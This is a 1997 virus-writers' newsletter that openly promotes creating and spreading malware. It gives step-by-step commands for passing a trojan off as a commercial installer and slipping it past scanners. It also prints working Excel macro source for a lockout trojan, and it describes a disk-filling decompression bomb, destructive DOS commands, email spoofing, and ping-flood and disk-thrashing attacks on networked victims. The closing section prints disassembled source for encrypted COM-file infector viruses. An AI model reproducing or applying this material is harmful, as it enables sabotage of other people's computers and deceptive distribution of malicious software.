God@rky's Virus Heaven Newsletter #3 Written by God@rky (C)Circle-A Computers 1997 All Rights Reserved... ----------------------------------------------------------------------------- **Warning** This magazine deals with Viruses, thier production, and thier distribution, and frankly anything else that is virus related that we wish to publish here. The ethics of this magazine's very existance my upset you. The intent of this magazine is to keep those interested in collecting or authoring viruses up to date as well as we can with some of the information that can be found here and abroad. If you have any questions, comments, ideas or article submissions, by all means send them via E-mail at: godarky@ilf.net ----------------------------------------------------------------------------- CONTENTS Section One - Introduction Section Two - How To Hide Your Virus/Trojan by Virulent Section Three - MS-Excel Shutdown Trojan Section Four - An Intro To Basic Computer Anarchy & The Techniques Involved Section Five - Site News & Info Section Six - Virus Heaven Hacked?!?! Section Seven - The Browser Wars Become Uneven? Maybe... Section Eight - A Small Virus Section Section Nine - The End ============================================================================= Introduction Yeah... It's been a little while since I have been able to crank out an issue of the Virus Heaven Newsletter. Those who have been e-mailing me asking when the next issue would be out, know that the date has been continually falling further and further behind. The backlog started when I threw out some articles for Virus Bits & Bytes magazine issue #4, and then continued through some upgrades on my system as well as an increasingly larger amount of time I am having to spend at work nowadays. Since the First issue, I have been getting all kinds of submissions for the newsletter. Some have been used in Virus Bits & Bytes Magazine #4, others have been held for this somewhat special issue of the newsletter. These are articles I was reluctant to publish due to the fact that they dont really deal with viruses, but more the ilk of Trojans and other forms of Malware. But due to the nature of the computer virus, I have decided that these things belong on thier own shelf, and will thus have thier own Issue, for the most part. Most of this newsletter is reader's submissions. If they want to be contacted, they will have left an e-mail address in thier submission. Anyhow, Enjoy the issue, and I will keep you posted about the next full scale issue to be released! ============================================================================= SECTION - 2 How to Hide Your Virus/Trojan (Revisited) ========================================= by Virulent (mdabrowski@juno.com) *WARNING* This article contains info that might be offensive to some. May I remind the reader, that in the United States, Canada, and the UK, virus creation is not a crime. Frankly, it's legal everywhere except for Sweden and Switzerland. The author disclaims any responsibility, blah, blah, blah. The author, however interested, doesn't condone the creation of destructive viruses. He hates them himself. If you're gonna do it, he does condone amusing viruses or ones with nifty visual displays. *NOTES* Let it be known that I consider myself an AVer, as well as a VXer. Any AVer that's not in the least bit way an VXer is just an AV wannabe. Any VXer that isn't a tad bit an AVer is an idiot. If you're around viruses as long as you might be, you're bound for infection. I have, and I have been toasted by such wonderful creations as Natas. I have no ill will against either community, and I love being a part of them both. If this article angers anyone in the AV community, that's their problem. I believe I'm making and will make lots of contributions to the field. Bug off. I'd also like it to be known that, for one reason alone, I have personal contempt for George Wenzel. I almost like most people in the AV community. I have no ill will towards the moderator of alt.comp.virus. Without him, alt.comp.virus would be flooded with make-money-fast posts and such. Kudos. My one reason for hating Mr. Wenzel is the fact that he likes to complain about VXers to their ISPs. This is a mean and contemptuous practice that must be stopped. No one should be "afraid" to post whatever they want on the Net. If you've been "harassed" by Mr. Wenzel at any point, contact me. I'd like to hear about it. And that's the only reason I dislike the man. I think he does a fine job on producing the comp.virus mini-faq. This has been my two-cent editorial on myself and those around me. Read it and weep, compadre. Necessary Software: NUTILS20.ZIP - The Nowhere Utilities Available everywhere. They're a must have for any power user, not just those into viruses. STEGANOS.ZIP - Steganos Available in many places, or by contacting me. It hides any file into a graphic, sound, or ASCII file. Also will support new file types, if necessary. ========================================= An article in CPI Newsletter Issue 2 starts, "So you've made the most k-rad virus in the history of the world. So what do you do with the damn thing?" This topic has been revisited by me, only because I've found new techniques that must be told. I'll also go over many older techniques, for the sake of completeness. For my ideas, the two pieces of software above are necessary. I use both of them everyday, not just for my viral needs. I. The Basics ============= Okay, here goes. The most basic way to hide a piece of viral software is to simply infect any old piece of shareware and upload it to a BBS or post it to a newsgroup. This is pretty pointless, especially for viruses that are not encrypted in any way or just don't work. They also get pointed out quickly, and you get flamed. Or George Wenzel gets your account canceled, whatever floats your boat. You should feel like a moron. II. PKLITE Files - More Virus, Less Byte ======================================== Doing! A light goes on in your head. You decide to PKLITE the file, remove the header, and then upload/post it. This may fool some scanners, but the good ones may still catch it. PKLITE reduces the size of a file. Viruses increase the size. If, in the end, the PKLITEd infected file is smaller than the original, use RESIZE, one of The Nowhere Utilities. That was Tip #1. In the end, even if the end user doesn't have a good scanner, he still may notice the file has changed, if: 1.) You haven't changed the size of the file in PACKING.LST or what have you. 2.) There's no authentication on the ZIP file. This is especially so for software from big name companies. 3.) The time/date stamp reads 1:05 a.m., Yesterday morning when the rest of the files read 3:15. p.m., July 9th, 1994. There are utilities around to solve these problems. Windows Notepad will solve #1. A program - I can't remember the name - distributed with an issue of 40Hex might solve #2. FIXTIME (A Nowhere Utility) will solve #3. Voila! The end user is completely fooled. Even though you may be miles away, you can hear him/her swearing as his CMOS is wiped out, or whatever. You go into school the next day, and you get a note from a friend. He needs a copy of ZeroBug.52086GFgbf?64, a new virus of which you have one of the 4 copies in the world. George Wenzel got your friend's account canceled, so he can't get it via e-mail. You decide to only way to get it to him is through the school's BBS. III. Getting that file to your Vx buddy ======================================= It turns out the teacher running the BBS is a paranoid little jerk that not only has 19 virus scanners scanning each upload, but personally inspects each file for usual stuff. And they pay him for this! Since the guy checks everything out, using the PKLITE technique ain't gonna help you. Luckily, you and your friend picked up a copy of STEGANOS, either from that brilliant article author, Virulent, or of some site on the Net. You decide to hide Zerobug in a picture of your personal hero, Bill Gates, or maybe that F-Prot wallpaper BMP Datafellows distributes. STEGANOS is simply to use. The syntax is as such: STEGANOS E or D means encode or decode /B means keep a backup of the original graphic file /D means to delete the file you've just hidden. It's pretty simple. So the jerk at school looks at your BMP of Chairman Bill, and just sees some pixels with strange colors. "Hmm. Must of had errors in the transfer." Your friend downloads the BMP and now has a copy of the now infamous Zerobug variant. (BTW, Zerobug is a neat virus, especially when you deliberately infect yourself to see the nifty effect. :) ) IV. Can You Go Over That Again? =============================== You may want to know EXACTLY how to do what I said in Section II, so I'll go over the command-by-command play of me replacing a copy of SoftRam, a Windows memory manager, with a trojan horse. It turns out that the thing I've selected to replace SoftRam with is a trojan, so I can't just infect the installation file. The setup's a Windows program anyway, so it'll be futile. I'll have to replace SETUP.EXE with the trojan. The trojan's name is Hemoroids, which I got off God@rky's web site. Here's a DIR of the original files in the zip: README WRI 20480 05-08-95 12:00p SETUP EXE 273920 05-08-95 12:00p SETUP INS 21085 05-08-95 12:00p SETUP LGO 391 05-08-95 12:00p SETUP PKG 193 05-08-95 12:00p SRAM Z 95294 05-08-95 12:00p SRAMRES DLL 15040 05-08-95 12:00p ~INS0763 LIB 7190 05-08-95 12:00p IMORTAL1 ASC 1448 07-01-96 7:15p HEMOROID EXE 2448 06-20-96 10:32p IMORTAL1.ASC would be an ad for the BBS I downloaded it from, which would be The Isles of the Immortals. (203-266-6079 8N1) I'd then take HEMOROID.EXE, which is 2448 bytes. Due to the 271,472 byte difference between HEMOROID.EXE and SETUP.EXE, I can't just rename HEMOROID.EXE. There's also the year time/date difference. So I'll first RESIZE (A Nowhere Util) HEMOROID to the size of SETUP: RESIZE -R 273920 HEMOROID.EXE -R is so that the 270,000 some odd bytes put into HEMOROID aren't all zeros, or it'll compress to around 5k. HEMOROID and SETUP are now the same size. Now the time/date stamp: FIXTIME 05-08-95 12:00 HEMOROID.EXE The directory listing should look like this now: README WRI 20480 05-08-95 12:00p SETUP EXE 273920 05-08-95 12:00p SETUP INS 21085 05-08-95 12:00p SETUP LGO 391 05-08-95 12:00p SETUP PKG 193 05-08-95 12:00p SRAM Z 95294 05-08-95 12:00p SRAMRES DLL 15040 05-08-95 12:00p ~INS0763 LIB 7190 05-08-95 12:00p IMORTAL1 ASC 1448 07-01-96 7:15p HEMOROID EXE 273920 05-08-95 12:00p Good. Now you can rename HEMOROID to SETUP. But the dang project isn't done yet. We need to PKZIP it up! Here's the two zip files. SOFTRAM.ZIP is the original. SOFTRAMI.ZIP is the infected one. I've also fixed the time/date stamp on SOFTRAMI.ZIP. The reason the ZIP's time/date stamp is so new, is that, since I downloaded it from a BBS, a ZIP comment was added, changing the date. SOFTRAMI ZIP 394813 09-09-96 9:50p IMORTAL1 ASC 1448 07-01-96 7:15p SOFTRAM ZIP 371552 09-09-96 9:50p IMORTAL1.ASC is our BBS comment file. Since the ZIPs aren't relatively exact until we add the comment, I'll do it: PKZIP -Z SOFTRAMI.ZIP < IMORTAL1.ASC And I'll fix the time/date stamp again. Now SOFTRAMI.ZIP could effectively pass as the original. And there's only a 23,261 byte size difference. And no one usually runs FC (file compare) on two ZIPs like that. Now you'd upload SOFTRAMI.ZIP (after renaming it and such) to your favorite BBS, or post it to your favorite binaries newsgroup. I never actually had SoftRam. It's a commercial program, so I had someone who did have it send me a DIR of the files to work with. I wouldn't use SoftRam as a trojan myself, considering there's more non-warez newsgroups and BBSes then there are warez ones, and we're going for maximum reach with the same file, eh? V. Conclusion ============= I've gone over a lot of techniques and such with you today, and I hope you use them well. As always, I take no responsibility. I hope this article sort of raises my standing in the Vx community, while not lowering it in the Av community. If you have any thing to add to this article, please e-mail me. If you have a flame, and are on a Unix-type system, type it into a text file and move it to /dev/null. In the future, I intend to write more articles and to possibly come out with my own virus scanner to take out any virus on the WildList or whatever. I hope to eventually even be one of the participants. If you'd like to join me on any of my yet-to-be-infamous exploits, my e-mail address is at the top of this article. Thanks, Virulent. ============================================================================= SECTION - 3 MS-Excel Macro - Shutdown Trojan The "shutdown.xls" is a trojan that although nondestructive is sure to piss off and confuse the average Excel user. It contains an Auto_Open macro which creates an ".xla" add-in file in the person's Excel startup directory entitled "msexcel.xls" (sounds pretty innocent, kinda like something you certainly wouldn't want to delete). The sole purpose of this file is to close Excel. The first time you open shutdown.xls, it creates this xla file then dissappears then shuts Excel off. Every time you try to open Excel in the future, it starts to fire up then automatically opens the xla file in the startup directory then shuts down. Until you delete the msexcel.xls file in your startup directory, you will be unable to open Excel. The beauty of an xla file is that you can't open it to see the contents. Noone is going to want to delete something that the can't look at first especially with a name lke msexcel.xls. If you want to create this yourself, the source code to the macro is below. I have tested it using Excel 5 for Win3.1 and Excel for Win95. Sub Auto_Open() Application.DisplayAlerts = False Dim Start As String Start = Application.StartupPath ChDir Start ExecuteExcel4Macro "VBA.MAKE.ADDIN(""msexcel.xla"")" Application.Quit End Sub That's it! Just name the file "msexcel.xls" and you are done! (Editor's Note): If you would like to see more of this guy's work, check out the Yohimbe Excel Macro Virus that appeared in Virus Bits & Bytes Magazine Issue #4. ============================================================================= SECTION - 4 An Introduction to basic computer anarchy and the techniques involved McNasty 1996 ----------------------------------------------------------------------------- Why am I writing this? I'm writing this due to the fact that I'm always being asked to help people who want to learn how to hack or how to create mayhem on other people's computers and I'm sick of repeating myself. I personally will accept no responsibility for any of the methods I describe creating damage on someone else's computer. If you're gonna do it, take the rap for it yerself! I'll try to outline some methods you can use to really give people a hard time if you feel fit. Contents: The Worm (and how to create a simple one using common ingredients found around the home) Tricks using DOS FakeMail Networking Havoc That's about all for this first tutorial, if you want more just drop me a line or give God@arky a shout and he'll pass it on. 1. The Worm What is a worm? A worm is a piece of code that basicaly replicates itself locally (not to be confused with a virus...the worm does not transfer from host to host, it just fucks up the computer it's run on) For example a file that just gets bigger and bigger until you got no more space left on your HDD. Sounds funky? it's dead easy to write and it's spectacular when it goes off! Imagine a 50k exe file that when it's run suddenly changes to 200MB and if you aint got 200MB free on your HDD you got big problems! Try this (i've already done so and it works fine and dandy) I've left out important bits, but once you get the idea it shouldn't be hard to suss out how to make it even worse. Create a text file using edit (I usually create a file that's full of spaces with the words "This space left intentionally blank" in the middle of the page) and press enter until it's quite large. Hilight the lot and copy and paste the text a few times until you have quite a large txt file then save it. Next write a batch file (called 1.bat or something like that) that copies your txt file onto itself and keeps looping. example: :loop copy stuff.txt stuff2.txt copy stuff.txt+stuff2.txt stuff.txt dir stuff.txt goto loop now run the bat file and watch it grow.....within a few minutes you've got a HUGE txt file that basically says 'this space left intentionally blank' When you've got a file sufficiently large enough (ie you've run out of disk space!) you've got the fun bit...... Enter the PK family.... OK, right, now just point PKZIP at it and you'll see the txt file compress to around 100k (depending on the compression type you use.....I've actually had it to about 50k!) Now you have a 100K zip file comtaining a 200MB txt file..... Right, now run ZIP2EXE on it and turn it into an exe file et voila! instant bomb! You can adda few little extras here. There's a program in the nowhere utilities that's a file padder. Run that and point it at your exe file to make it exactly the same as a known file on the victim's computer. Then plant it and sit back and watch the fireworks. Another way of getting the victim to run the bomb is to get a copy of QBASIC 4.5 or VB and write a little program that looks like an installer, but instead of installing it's doing damage. I got a guy with this and he was running the installer for 20 mins. After he got bored of waiting he rebooted only to find that his HDD was full of a HUGE txt file (he had a 1GB HDD) and wouldn't boot 'cos the boot sector had been corrupted. The hardest thing with a worm is actually getting the victim to run it. If you use one of the ways I described it should make it a lot easier to dupe your victim into committing HD Murder. 2. Tricks using DOS Yeah yeah yeah I knwo what you're saying 'we use windows, why use dos?'. Basically you can do a hellova lot more with a CLI than you can with a GUI (at least at the moment you can) and it's easier to work with (as far as I'm concerned!) Some undocumented stuff to do in DOS (some of it good some of it not) ONLY TRY THESE IF YOU WANT TO AND DON'T EVEN THINK ABOUT BLAMING ME IF YOU FUCK UP YOUR COMPUTER! Echo 123>clock$ This is a funky little command that overwrites your internal dos variable clock$ and crashes your computer with a stack overflow. After rebooting you will notice that your bios has been corrupted and depending on your bios, all your settings have been filled with shit. Some BIOS's only get the date and time corrupted, but some actually completely reset themselves (not nice if your bios doesn't have a HD autodetect!) There are all sorts of internal variables that you can overwrite with the echo command. To get a list of these type mem/debug/p and see what you can play with BUT BE CAREFUL! the eternally famous deltree /y c:\windows just deletes your windows directory without prompting for confirmation. This also works with format too. Attrib c:\command.com +h +s +r means that you'll have to boot from floppy until you unhide command.com. A handy thing to do (but you need a little time in private) is to run PCTOOLS or norton hex editor and change the boot sector info on your or your victim's HDD from NON bootable disk blah blah blah to "This disk has been infected by the Good-Times Virus" then every time you format a floppy from your computer the boot sectors of the disks you format wil have a message about the goodtimes virus if you try to boot from them! 3. FakeMail (or how to confuse the hell out of lamers) This is also very handy for stopping unwanted spam coming in by spammers stealing your email address from the newsgroups. In Netscape select Options, then Mail and News Preferences, then Identity and change your return email address to whatever you want (I have been known to make it the same email address as the vitim you want to hit with the fakemail so when he replies he just spams himself!) NOTE: This takes effect on the NEXT email you send, so if you've already selected to send an email and then change your return address and identity it will not take effect on that email. BE AWARE OF THIS AS IT CAN GET YOU IN SOME SHIT IF YOU SEND OBNOXIOUS MAILS THINKING YOU'VE REMOVED ALL TRACE OF YOUR IDENTITY. Also, be aware of the fact that this is not untraceable, the only way of sending untraceable email is either by using the port25 option in UNIX or using an anonymous remailer (even then the remailer has an obligation to give your details to the authorities if requested to do so in some countries) 4. Networking Havoc If you have a network in your office or school you can create all sorts of mayhem. Here a few ways to do so. Ping! If your net transport is tcpip you can realy bring the network speed down by ping flooding everyone. Find out the ip address of your victim(s) and then just ping them continually from a bat file. ie.. :loop ping 127.0.0.1 (or the ip address of the victims terminal) goto loop and then run the batch file in the background. In windows95/NT if you have tcpip networking you have ping in your windows directory as well as a few other things like telnet, and tracert. SwapFile Havoc! If the victim on the network has a shared directory (ie to play network doom etc..) you can really play hell with their computer. Map the victim's directory Create a new directory on the victims shared directory. create a bat file on your computer like this. (I'll use doom as an example) :loop copy x:\doom.wad x:\new\doom.wad del x:\doom.wad copy x:\new\doom.wad x:\doom.wad del x:\new\doom.wad goto loop Basically, this copies the doom.wad backwards and forwards between the original directory and the new directory. Bearing in mind that the doom.wad is about 15MB and is deleted when copied, the victim just sees his hard drive going ballistic and all his processes slow down to a crawl because he's having to share hard drive access between his swapfile and a remote process (which doesn't affect the speed of your terminal!) I did this to a victim and he ended up reformatting his HD because his computer was running like a pig and hammering his HD all the time. Another advantage of running stuff like this from a remote terminal is that if you are about to be discovered, you can always swithc off the process. Well, that's it for now. If you liked this, thanks. If you didn't, why did you bother downloading it in the first place! If you want more, let me know. McNasty ============================================================================= SECTION - 5 Site News & Info By God@rky Well there has been quite a bit of things going on in the VX world. Perhaps I will remember it all, perhaps not. One of the biggest additions to the Vx world recently was the appearance of the West Coast Institute Of Virus Research (www.wcivr.com). There has been much talk about this site, and I can see why. The site is maintained by Falcon, and contains a very vast collection of Viruses. In the newsgroup alt.comp.virus, there has been some squabbling over wether or not the AV programs mentioned on the site detect the viruses or not. Many of the viruses there are indeed detected. And I believe there will be quite a few there that aren't currently detected. I personally don't have the time to test my own site and collection, let alone Falcon's. And really, what is it with the interest it has stirred up anyway of the AV folks. Since when did they start caring whether claims a Vx site makes are true or not, or for that matter backed by science? Get real. Anyways, the URL is; http://www.wcivr.com Give it a look-see, you may be surprised, and it may become a vastly used bookmark in your browser. The Virus Programming Instruction Page is back on-line with a new ISP, Be sure and update your links to http://www.goodnet.com/~jwools/vir.htm As many of you noticed (depending on where you picked up VBB Issue #4) The VBB site has received a face-lift. Still in the same location, just organized somewhat differently. Received News awhile back, not sure if it is still available or not: The Earth Crisis (203)753-3212 8N1 It runs a little slow on purpose. They have deliberately put up some lame stuff to stop some people from calling. Supposed to be a HEAVY VX BBS. Dunno, haven't had the desire to see my LD phone bill take a rise recently, so I have not checked it out. ============================================================================= SECTION - 6 Virus Heaven Hacked?!?! By God@rky I guess as many of you may have seen, The Virus Heaven Website was hacked. The only damage done was visual, and simply remedied by re-loading the HTML onto the site. Instead of the usual Anti-Censorship Garb that appears on the graphics version of the site, the hacks left a "Microsoft Nazis" logo there, and renamed the "40hex" zines to "40sex". As i said, it was an uninspired easy hack, that was easily remedied. Then afterwords, I was unable to access my E-mail or update the site. I am not sure if this was do to Chaos changing my password (to prevent further hacks through my account) and not informing me of the change, or if my account was hacked a second time. The total time I was unable to update the site or check my mail was exactly ONE MONTH. Also, as many of you noticed, a week or two after my site was hacked, The Alliance Virus Group page was hacked as well. The leftovers, at that point named "The Alliance Virus Football Page" with links to a S.I.N. site and some other site that escapes memory now, and captioned at the bottom, "Hacked By DaFool". During this time, I thought alot about the site I maintain, and the Service/Disservice I provide the Internet Community. At one point, I became tired of the entire commotion that comes about when you make viruses available over the Internet. The size of the withdrawl's from my precious wallet of spare time that the site made were quite large. I was ready to end the site. It was voiced by many, that DaFool, and who else hacked the ILF Server were doing a great disservice to the entire hacking community, as the server will provide a home, hassle free for such sites. Others stated that it was probably a hack aimed at the Alliance for some kind of mental masturbation in a "Hack-war" of some sorts. But then again, who really gives a fuck, huh? The hack apparently provided a service, as security was upped at ILF. I have decided against shutting down the site for the time being. I am not sure what made me change my mind to continue running the site... Hell, who knows when it will change again. Many of the sites on ILF are now gone. One of the hard drives was cleared, so they will be re-appearing in a matter of time. But I thought it was important that I let you all know why I wasn't responding to your mail or why the Virus Of the Month for February were 2-3 months old. ============================================================================= SECTION - 7 The Browser Wars Become Uneven? Maybe... By God@rky (NOTE: This article's primary reason for appearing in this issue, is because of the possibuility made for WWW trojans) We all have been witness to the battle between Microsoft and Netscape. The battlefield? Primarily the WWW. The weapons? All the plug-in's and processor bogging features you can (or in some cases CAN'T) handle. But a new weapon brought in by MicroSoft, may have backfired. That weapon is known as ACTIVE-X. I am not going to go into the specifics of ACTIVE-X's flaws or security holes, there will be an URL at the end of this article which will take you to a site that will tell you everything you wanted to know about the problems with Internet Explorer and Active-X. Apparently Active-X makes it possible to run *ANY* program on the client machine of the person who is viewing the page with the propper Active-X malware scripted into it. I suppose this means that a "harmless" viewing of your favorite web site can trigger the FORMAT command, or even a virus (Vx dropper). From everything I have read, this is not possible with Netscape (any version). And from recent news, I guess Microsoft isn't planning on plugging these security holes. But then why would they. They didn't make it any harder to create Macro Viruses with Office 97 in either Excel or Word. Now that there are more than 400 Word Macro Viruses alone, and probably quite a few more being made each day, there isn't much they can do. Here is the URL for the site that dives into the world of Over-If-Not-Hyper-Active-X and Internet Explorer; http://www.halcyon.com/mclain/ActiveX/ (Note: Not sure, as I don't use Internet Explorer, but I would recommend using Netscape when you visit this site. ) ============================================================================= SECTION - 8 The Small Virus Section Well I just didn't think it would be right to do an issue without some sort of virus info in it, so here we are. Some of you are framiliar with the King Lizard line of viruses (the Coconut family). Well here are dooMSday's careful analysis of the first two coconut viruses, COCONUT-OW! and COCONUT-AP! ; ------------------------------------------------------------------------ ; THE COCONUT-AP! VIRUS ; (analysis: dooMSday) ; ; * direct action com-file infector (only if 128 < filesize < 60000 bytes ; and if filename is not '??MM????.COM' --> no COMMAND.COM infection) ; * tries to infect two files each time an infected file is executed ; * no date/time change ; * encrypted ; * debugger trap ; * activation date: Dec. 25th / Dec. 31st --> displays message ; * able to change directory (".." method) ; * signature "IN" at offset 0103h ; * virus author: @King Lizard ; ------------------------------------------------------------------------ .MODEL TINY .RADIX 16 .CODE ORG 100 START: JMP VIR_ENTRY DB 49,4E ;-------- original program code ----------- ; db 79 dup (90) INT 20 ;------------------------------------------ VIR_ENTRY: CALL GET_IP GET_IP: MOV AX,4C00 SUB AH,22 ;AX=2Ah INT 21 ;get Date POP BP PUSH DX SUB BP,0108 ;BP=007Bh CALL DECODE POP DX CMP DH,0C ;month=Dec. ? JNZ LAB_02 CMP DL,19 ;day=25 ? JZ LAB_01 CMP DL,1F ;day=31 ? JNZ LAB_02 LAB_01: CALL PAYLOAD LAB_02: CALL NEW_VECTOR CALL RESTORE_BYTES CALL PROC_2 CALL PROC_3 FIND_FIRST: MOV AH,4Dh INC AH ;AH=4Eh MOV CX,0007 LEA DX,[BP+07EDh] ;(COM_STRING) INT 21 ;Find First JNB LAB_06 JMP LAB_05 LAB_07: JMP LAB_03 LAB_06: ; file= '??MM????.COM' ? CMP WORD PTR DS:[BP+08B3],4D4Dh JZ LAB_07 ;file length: CMP WORD PTR DS:[BP+08ADh],0080 JB LAB_07 ; < 128 Bytes ! CMP WORD PTR DS:[BP+08ADh],60EA JA LAB_07 ; > 60000 Bytes ! LEA DX,[BP+08B1] MOV AX,4C00 SUB AX,08FF ;AX=4301h SUB CX,CX INT 21 ;set attrib. JB LAB_07 MOV AX,4C00 SUB AX,0EFE ;AX=3D02h LEA DX,[BP+08B1] INT 21 ;open file JB LAB_07 XCHG BX,AX ;BX=handle MOV CX,0005 MOV AH,3F ;read file LEA DX,[BP+0845] ;[ORIGINAL_BYTES] INT 21 CMP WORD PTR DS:[BP+0848],4E49 ;signature ? JZ LAB_07 CALL MOVE_POINTER SUB AX,0003 MOV DS:[BP+0841],AX ;[P_JUMP+1] MOV AX,4200 ;move file pointer CWD SUB CX,CX INT 21 MOV CX,0005 MOV AH,3F INC AH ;AH=40h LEA DX,[BP+0840] ;(P_JUMP) INT 21 ;write file CALL MOVE_POINTER CALL NEW_KEY CALL ENCODE MOV CX,074E MOV AH,3F INC AH ;AH=40h LEA DX,[BP+0105] ;(VIR_ENTRY) INT 21 ;write file CALL DECODE CALL PROC_4 LAB_05: INC BYTE PTR DS:[BP+084F] ;[U_K] CMP BYTE PTR DS:[BP+084F],02 ;[U_K] JNZ LAB_03 MOV AX,4C00 SUB AH,32 ;AH=1Ah MOV DX,0080 INT 21 ;set DTA Adr. MOV AH,3Bh ;set directory LEA DX,[BP+0852] ;(P_DIRECTORY) INT 21 CALL RESTORE_VECTOR MOV BX,0101 DEC BX JMP BX ;Jump 0100 LAB_03: CALL PROC_4 MOV AH,50 DEC AH ;AH=4Fh INT 21 ;find next JB LAB_04 JMP LAB_06 LAB_04: MOV AH,3Bh ;set directory LEA DX,[BP+084A] ;(PARENT_DIR) INT 21 JB LAB_05 JMP FIND_FIRST MOVE_POINTER: MOV AX,4202 ;move file pointer CWD SUB CX,CX INT 3 RET NEW_VECTOR: CLI PUSH DS XOR AX,AX MOV DS,AX ;DS=0000h MOV AX,word ptr[offset start-00F4] ;get Int 03h offset ;and save it MOV CS:[BP+083C],AX ;[INT_3_OFFSET] MOV AX,word ptr[offset start-00F2] ;get Int 03h segment ;and save it MOV CS:[BP+083E],AX ;[INT_3_SEGMENT] MOV AX,word ptr[offset start-007C] ;get Int 21h offset MOV word ptr[offset start-00F4],AX ;copy to Int 3 offset MOV AX,word ptr[offset start-007A] ;get Int 21h segment MOV word ptr[offset start-00F2],AX ;copy to Int 3 segment POP DS STI RET RESTORE_BYTES: LEA SI,[BP+0845] ;[ORIGINAL_BYTES] MOV DI,0100 MOVSW MOVSW MOVSB RET PROC_2: MOV BYTE PTR DS:[BP+084F],00 RET PROC_3: MOV AH,47 ;get directory SUB DL,DL LEA SI,[BP+0853] ;(P_DIRECTORY +1) INT 3 MOV AH,1A ;set DTA adr. LEA DX,[BP+0893] ;(P_DIRECTORY +65d) INT 3 RET RESTORE_VECTOR: CLI PUSH DS XOR AX,AX MOV DS,AX MOV AX,CS:[BP+083C] ;[INT_3_OFFSET] MOV word ptr[offset start-00F4],AX ;=000Ch MOV AX,CS:[BP+083E] ;[INT_3_SEGMENT] MOV word ptr[offset start-00F2],AX ;=000Eh POP DS STI RET NEW_KEY: MOV AH,2C ;get time INT 3 CMP DX,+00 JZ NEW_KEY MOV DS:[BP+0850],DX ;[P_KEY] RET PROC_4: SUB CX,CX MOV CL,DS:[BP+08A8] LEA DX,[BP+08B1] MOV AX,4301 ;set attrib. INT 3 MOV CX,DS:[BP+08A9] MOV DX,DS:[BP+08ABh] MOV AX,5701 ;set file date/time INT 3 MOV AH,3E ;close file INT 3 RET PAYLOAD: SUB CX,CX MOV DX,314F MOV BX,0700 MOV AX,0600 ;CLS INT 10 MOV AH,05 ;activate screen page 0 INT 10 MOV AX,1112 ;8*8 SUB BL,BL INT 10 MOV AH,12 ;? MOV BL,20 INT 10 MOV AH,09 ;display String LEA DX,[BP+02EDh] ;(MESSAGE) INT 21 INT 20 ;exit RET ;------------------------------------------- DATA AUTHOR DB '[by @King Lizard]' MESSAGE DB 0Dh,0A, ' ooooo@@@@@@@@@@@@@ooooo' DB 0Dh,0A, ' oo@@@@@@@@@@@@@@@@@@@@@@@@@oo' DB 0Dh,0A, ' oo@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@oo' DB 0Dh,0A, ' o@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@o' DB 0Dh,0A, ' o@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@o' DB 0Dh,0A, ' o@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@o' DB 0Dh,0A, ' @@@@@@@@@@@ @@@@@@@@@@@ @@@@@@@@@@@@' DB 0Dh,0A, ' @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@' DB 0Dh,0A, '@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@' DB 0Dh,0A, '@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@' DB 0Dh,0A, '@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@' DB 0Dh,0A, ' @@@@ "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@" o@@@' DB 0Dh,0A, ' @@@o """@@@@@@@@@@@@@@@@@@@@@@""" o@@@' DB 0Dh,0A, ' @@@o "@@@"@@@@@@"@@@" o@@@' DB 0Dh,0A, ' @@@@o @ @ o@@@"' DB 0Dh,0A, ' "@@@@o o@@@@' DB 0Dh,0A, ' "@@@@@o @ @ o@@@@@"' DB 0Dh,0A, ' ""@@@@@o@@@oooooooo@@@o@@@@@""' DB 0Dh,0A, ' ""@@@@@@@@@@@@@@@@@@@@""' DB 0Dh,0A, ' ""@@@@@@@@@@@@@""' DB 0Dh,0A, '  ' DB 0Dh,0A, ' * *' DB 0Dh,0A, ' *** ***' DB 0Dh,0A, ' ***** Virus coconut wishes you a merry *****' DB 0Dh,0A, '******* christmas and a happy new year!! *******' DB 0Dh,0A, ' * *' DB 0Dh,0A, ' * *' DB 0Dh,0A,'$' ; COM_STRING DB '*.COM',0 ; ENCODE: CALL PROC_1 LAB_ENCODE_01: CMP WORD PTR DS:[BP+084Dh],+01 ;[P_COUNT] DEC WORD PTR DS:[BP+084Dh] ;[P_COUNT] JB LAB_08 LODSW ROR AX,CL XOR AX,CX ADD AX,CX STOSW JMP LAB_ENCODE_01 LAB_08: RET PROC_1: MOV WORD PTR DS:[BP+084Dh],02EC ;[P_COUNT] LEA SI,[BP+021Bh] ;(MOVE_POINTER) MOV CX,DS:[BP+0850] ;[P_KEY] MOV DI,SI RET DECODE: CALL PROC_1 LAB_DECODE_01: CMP WORD PTR DS:[BP+084Dh],+01 ;[P_COUNT] DEC WORD PTR DS:[BP+084Dh] ;[P_COUNT] JB LAB_09 LODSW SUB AX,CX XOR AX,CX ROL AX,CL STOSW JMP LAB_DECODE_01 LAB_09: RET ; INT_3_OFFSET DB 0F4,06 INT_3_SEGMENT DB 70,00 P_JUMP DB 0E9,7Dh,00 SIGNATURE DB 49,4E ORIGINAL_BYTES DB 90,90,90,90,90 PARENT_DIR DB '..',0 P_COUNT DB 0FF,0FF U_K DB 01 P_KEY DB 00,00 P_DIRECTORY DB '\' ;------------------ ; XXXX:08CE Directory Puffer ; XXXX:090E New_DTA_Adr ; ; 090E reserved ; 0923 attrib. ; 0924 time ; 0926 date ; 0928 file length (low) ; 092A file length (high) ; 092C file name ; And here is the Coconut-OW! virus; ; ------------------------------------------------------------- ; The COCONUT-OW! virus (Coconut.1323) ; (analysis by DooMSday) ; ============================================================= ; * direct action, overwriting com-file infector ; * activation date: August 31st ---> displays message ; * no date/time change ; * encrypted ; * tries to infect all files in the current directory ; * contains a bug (?) (see EOF) ; * virus author: The King Lizard ; ------------------------------------------------------------------------ .MODEL TINY .RADIX 16 .CODE ORG 100 START: CALL DECODE JMP short LAB_01 PROC_02: CALL NEW_KEY MOV DX,009E CALL ENCODE MOV AX,4300 ;read file attribute INT 01 MOV [ATTRIBUTE],CX XOR CX,CX MOV AX,4301 ;set file attribute INT 01 MOV AX,3D02 ;open file: read/write INT 01 